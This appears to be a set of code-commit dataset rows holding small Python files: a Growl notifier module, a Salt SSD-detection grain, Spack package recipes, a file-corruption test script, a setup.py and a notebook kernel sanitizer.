`title' is the user-visible title for this notification.
`description' is the user-visible description of this notification.
`icon' is an optional icon for this notification. It defaults to
`self.applicationIcon'.
`appicon' is an optional icon for the sending application.
`sticky' is a boolean controlling whether the notification is sticky.
"""
assert noteType in self.notifications
if icon is None:
icon = self.applicationIcon
n = {'NotificationName': noteType,
'ApplicationName': self.applicationName,
'NotificationTitle': title,
'NotificationDescription': description,
'NotificationIcon': icon.TIFFRepresentation()}
if appicon is not None:
n['NotificationAppIcon'] = appicon.TIFFRepresentation()
if sticky:
n['NotificationSticky'] = NSNumber.numberWithBool_(True)
d = NSDictionary.dictionaryWithDictionary_(n)
notCenter = NSDistributedNotificationCenter.defaultCenter()
notCenter.postNotificationName_object_userInfo_deliverImmediately_('GrowlNotification', None, d, True)
def main():
from Foundation import NSRunLoop, NSDate
class TestGrowlNotifier(GrowlNotifier):
applicationName = 'Test Growl Notifier'
notifications = ['Foo']
n = TestGrowlNotifier(applicationIcon=NSWorkspace.sharedWorkspace().iconForFileType_('unknown'))
n.register()
# A small delay to ensure our notification will be shown.
NSRunLoop.currentRunLoop().runUntilDate_(NSDate.dateWithTimeIntervalSinceNow_(0.1))
n.notify('Foo', 'Test Notification', 'Blah blah blah')
if __name__ == '__main__':
main()
| """
A Python module that enables posting notifications to the Growl daemon.
See <http://sourceforge.net/projects/growl/> for more information.
Requires PyObjC 1.1 <http://pyobjc.sourceforge.net/> and Python 2.3
<http://www.python.org/>.
Copyright 2003 Mark Rowe <bdash@users.sourceforge.net>
Released under the BSD license.
"""
from Foundation import NSArray, NSDistributedNotificationCenter, NSDictionary, NSNumber
from AppKit import NSWorkspace
class GrowlNotifier(object):
"""
A class that abstracts the process of registering and posting
notifications to the Growl daemon.
You can either pass `applicationName', `notifications',
`defaultNotifications' and `applicationIcon' to the constructor
or you may define them as class-level variables in a sub-class.
`defaultNotifications' is optional, and defaults to the value of
`notifications'. `applicationIcon' is also optional but defaults
to a pointless icon so is better to be specified.
"""
applicationName = 'GrowlNotifier'
notifications = []
defaultNotifications = None
applicationIcon = None
def __init__(self, applicationName=None, notifications=None, defaultNotifications=None, applicationIcon=None):
if applicationName is not None:
self.applicationName = applicationName
if notifications is not None:
self.notifications = notifications
if defaultNotifications is not None:
self.defaultNotifications = defaultNotifications
if applicationIcon is not None:
self.applicationIcon = applicationIcon
def register(self):
"""
Register this application with the Growl daemon.
"""
if not self.applicationIcon:
self.applicationIcon = NSWorkspace.sharedWorkspace().iconForFileType_("txt")
if self.defaultNotifications is None:
self.defaultNotifications = self.notifications
regInfo = {'ApplicationName': self.applicationName,
'AllNotifications': NSArray.arrayWithArray_(self.notifications),
'DefaultNotifications': NSArray.arrayWithArray_(self.defaultNotifications),
'ApplicationIcon': self.applicationIcon.TIFFRepresentation()}
d = NSDictionary.dictionaryWithDictionary_(regInfo)
notCenter = NSDistributedNotificationCenter.defaultCenter()
notCenter.postNotificationName_object_userInfo_deliverImmediately_("GrowlApplicationRegistrationNotification", None, d, True)
def notify(self, noteType, title, description, icon=None, appicon=None, style=None, sticky=False):
"""
Post a notification to the Growl daemon.
`noteType' is the name of the notification that is being posted.
`title' is the user-visible title for this notification.
`description' is the user-visible description of this notification.
`icon' is an optional icon for this notification. It defaults to
`self.applicationIcon'.
`appicon' is an optional icon for the sending application.
`sticky' is a boolean controlling whether the notification is sticky.
"""
assert noteType in self.notifications
if icon is None:
icon = self.applicationIcon
n = {'NotificationName': noteType,
'ApplicationName': self.applicationName,
'NotificationTitle': title,
'NotificationDescription': description,
'NotificationDefault': NSNumber.numberWithBool_(True),
'NotificationIcon': icon.TIFFRepresentation()}
if style is not None:
n['NotificationDefault'] = NSNumber.numberWithBool_(False)
if appicon is not None:
n['NotificationAppIcon'] = appicon.TIFFRepresentation()
if sticky:
n['NotificationSticky'] = NSNumber.numberWithBool_(True)
d = NSDictionary.dictionaryWithDictionary_(n)
notCenter = NSDistributedNotificationCenter.defaultCenter()
notCenter.postNotificationName_object_userInfo_deliverImmediately_('GrowlNotification', None, d, True)
def main():
from Foundation import NSRunLoop, NSDate
class TestGrowlNotifier(GrowlNotifier):
applicationName = 'Test Growl Notifier'
notifications = ['Foo']
n = TestGrowlNotifier(applicationIcon=NSWorkspace.sharedWorkspace().iconForFileType_('unknown'))
n.register()
# A small delay to ensure our notification will be shown.
NSRunLoop.currentRunLoop().runUntilDate_(NSDate.dateWithTimeIntervalSinceNow_(0.1))
n.notify('Foo', 'Test Notification', 'Blah blah blah')
if __name__ == '__main__':
main()
| Python | 0 |
41752bfcbc0a1afdf7a0f3caa52285af08d131dd | Create get_var.py | get_var.py | get_var.py | import parse_expr
variables = {}
def getVar(key):
if key[0] == '%':
return variables[key[1:]]
elif key[-1] in ('+', '-', '/', '*'):
return parse_expr(key)
else:
return key
| Python | 0.000002 | |
e42142498f2ef2b3e78d1becb024441500902a79 | add corruptor | test/corrupt.py | test/corrupt.py | #!/usr/bin/env python
from __future__ import print_function
import os
import sys
import random
if len(sys.argv) != 3 and not sys.argv[2]:
print('''
Usage: corrupt.py filename magic_string
magic_string is what you want to write to the file
it can not be empty and will be randomly placed \n\n''')
sys.exit(1)
size = 0
index = 0
try:
size = os.stat(sys.argv[1]).st_size
except Exception as e:
print(e)
sys.exit(1)
with open(sys.argv[1], "rb+") as f:
index = random.randint(0, size)
f.seek(index)
f.write(sys.argv[2])
print("Corrupted file offset: %s\n" % index)
| Python | 0.999262 | |
d2f18cc0992d4d7217583cd2601bc90afaa93a04 | add grain that detects SSDs | salt/grains/ssds.py | salt/grains/ssds.py | # -*- coding: utf-8 -*-
'''
Detect SSDs
'''
import os
import salt.utils
import logging
log = logging.getLogger(__name__)
def ssds():
'''
Return list of disk devices that are SSD (non-rotational)
'''
SSDs = []
for subdir, dirs, files in os.walk('/sys/block'):
for dir in dirs:
flagfile = subdir + '/' + dir + '/queue/rotational'
if os.path.isfile(flagfile):
with salt.utils.fopen(flagfile, 'r') as _fp:
flag = _fp.read(1)
if flag == '0':
SSDs.append(dir)
log.info(dir + ' is a SSD')
elif flag == '1':
log.info(dir + ' is no SSD')
else:
log.warning(flagfile + ' does not report 0 or 1')
log.debug(flagfile + ' reports ' + flag)
else:
log.warning(flagfile + ' does not exist for ' + dir)
return {'SSDs': SSDs}
| Python | 0.000002 | |
936c2327d6be9da48dfbef47c17167510e9c2262 | Create bzip2.py | wigs/bzip2.py | wigs/bzip2.py | class bzip2(Wig):
tarball_uri = 'http://www.bzip.org/1.0.6/bzip2-$RELEASE_VERSION$.tar.gz'
last_release_version = 'v1.0.6'
| Python | 0.000007 | |
c2ca8328835d544440fd3b87813e2768ece58685 | Add new package: audacious (#16121) | var/spack/repos/builtin/packages/audacious/package.py | var/spack/repos/builtin/packages/audacious/package.py | # Copyright 2013-2020 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class Audacious(AutotoolsPackage):
"""A lightweight and versatile audio player."""
homepage = "https://audacious-media-player.org/"
url = "https://github.com/audacious-media-player/audacious/archive/audacious-4.0.2.tar.gz"
version('4.0.2', sha256='92f30a78353c50f99b536061b9d94b6b9128760d546fddbf863e3591c4ac5a8d')
version('4.0.1', sha256='203195cf0d3c2e40d23c9895269ca0ace639c4a2b4dceb624169d75337059985')
version('4.0', sha256='cdfffd0eb966856980328ebb0fff9cbce57f99db9bda15e7e839d26c89e953e6')
version('3.10.1', sha256='c478939b4bcf6704c26eee87d48cab26547e92a83741f437711178c433373fa1')
version('3.10', sha256='82710d6ac90931c2cc4a0f0fcb6380ac21ed42a7a50856d16a67d3179a96e9ae')
depends_on('m4', type='build')
depends_on('autoconf', type='build')
depends_on('automake', type='build')
depends_on('libtool', type='build')
depends_on('glib')
depends_on('qt')
def autoreconf(self, spec, prefix):
bash = which('bash')
bash('./autogen.sh')
| Python | 0.00002 | |
4287d2290c581b907b08efabc1e6bccea4019ac6 | add new package (#15743) | var/spack/repos/builtin/packages/py-pyface/package.py | var/spack/repos/builtin/packages/py-pyface/package.py | # Copyright 2013-2020 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
class PyPyface(PythonPackage):
"""The pyface project contains a toolkit-independent GUI abstraction layer,
which is used to support the "visualization" features of the Traits
package. Thus, you can write code in terms of the Traits API (views, items,
editors, etc.), and let pyface and your selected toolkit and back-end take
care of the details of displaying them."""
homepage = "https://docs.enthought.com/pyface"
url = "https://pypi.io/packages/source/p/pyface/pyface-6.1.2.tar.gz"
version('6.1.2', sha256='7c2ac3d5cbec85e8504b3b0b63e9307be12c6d710b46bae372ce6562d41f4fbc')
variant('backend', default='pyqt5', description='Default backend',
values=('wx', 'pyqt', 'pyqt5', 'pyside'), multi=False)
depends_on('py-setuptools', type='build')
depends_on('py-traits', type=('build', 'run'))
# Backends
depends_on('py-wxpython@2.8.10:', when='backend=wx', type=('build', 'run'))
depends_on('py-numpy', when='backend=wx', type=('build', 'run'))
depends_on('py-pyqt4@4.10:', when='backend=pyqt', type=('build', 'run'))
depends_on('py-pygments', when='backend=pyqt', type=('build', 'run'))
depends_on('py-pyqt5@5:', when='backend=pyqt5', type=('build', 'run'))
depends_on('py-pygments', when='backend=pyqt5', type=('build', 'run'))
depends_on('py-pyside@1.2:', when='backend=pyside', type=('build', 'run'))
depends_on('py-pygments', when='backend=pyside', type=('build', 'run'))
| Python | 0 | |
be0033ac91c28f3e45eff34c84b7da59d7fcefe2 | add py-ranger package (#3258) | var/spack/repos/builtin/packages/py-ranger/package.py | var/spack/repos/builtin/packages/py-ranger/package.py | ##############################################################################
# Copyright (c) 2013-2016, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, tgamblin@llnl.gov, All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/llnl/spack
# Please also see the LICENSE file for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
#
from spack import *
class PyRanger(PythonPackage):
"""A VIM-inspired filemanager for the console"""
homepage = "http://ranger.nongnu.org/"
url = "https://github.com/ranger/ranger/archive/v1.7.2.tar.gz"
version('1.7.2', '27805c3ab7ec4b129e1b93249506d925')
depends_on('python@2.6:')
| Python | 0 | |
7e4a62aa483fbadc7089144191e48948f419903b | add setup.py | py/setup.py | py/setup.py | #!/usr/bin/env python
# vim: set fileencoding=utf8 shiftwidth=4 tabstop=4 textwidth=80 foldmethod=marker :
# Copyright (c) 2010, Kou Man Tong. All rights reserved.
# For licensing, see LICENSE file included in the package.
from distutils.core import setup
setup(name = "vtdb",
packages=["vtdb", "net"],
platforms = "Any",
)
| Python | 0 | |
a8f1529f6c077c0d70ccb326da6e63f3dd78ec76 | move kernel sanitization to separate script | sanitize_kernels.py | sanitize_kernels.py | import glob
import nbformat
#sanitize kernelspec
notebooks = glob.glob("notebooks/*.ipynb")
old_envs = {}
for nb in notebooks:
tmp = nbformat.read(nb,4)
old_envs[nb] = tmp['metadata']['kernelspec']['name']
tmp['metadata']['kernelspec']['name'] = 'python2'
nbformat.write(tmp,nb)
#revert kernelspec
#for k in old_envs:
# tmp = nbformat.read(k,4)
# tmp['metadata']['kernelspec']['name'] = old_envs[k]
# nbformat.write(tmp,k)
| Python | 0.000001 | |
9b4f18dbf63a76bd2c0723677fb0d0215831324a | Create __init__.py | ext/__init__.py | ext/__init__.py | Python | 0.000429 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.